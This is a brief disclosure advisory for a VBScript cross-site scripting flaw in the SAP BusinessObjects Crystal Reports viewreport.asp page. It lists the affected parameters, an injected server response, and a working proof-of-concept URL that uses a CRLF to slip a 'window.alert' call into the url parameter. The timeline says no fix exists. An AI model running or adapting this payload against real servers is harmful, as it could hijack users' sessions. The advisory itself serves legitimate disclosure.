- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS - Description Cross-site scripting; vbscript rather than javascript. Subsequent page will contain pop up reading "fsck_cissp". ID, PROMPTEX-SESSION_ID, PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1, PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4, PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7, PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected. The following is the response: <SCRIPT LANGUAGE="VBScript"> <!-- Sub window_onLoad() Page_Initialize() End Sub Sub Page_Initialize On Error Resume Next Dim webBroker Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1") if err.number <> 0 then window.alert "The Crystal ActiveX Viewer is unable to create it's resource objects." CRViewer.ReportName = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777 <https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777> " window.alert "fsck_cissp" else Dim webSource0 Set webSource0 = CreateObject("CrystalReports11.WebReportSource.1") webSource0.ReportSource = webBroker webSource0.URL = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777 <https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777> " window.alert "fsck_cissp" webSource0.PromptOnRefresh = True CRViewer.ReportSource = webSource0 end if CRViewer.ViewReport End Sub --> </SCRIPT> - Product SAP BusinessObjects, Crystal Reports, unknown - PoC https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect - Solution None - Timeline 2008-01-23: Vulnerability discovered 2008-02-15: Vendor contact methods unacceptable (paying customers only)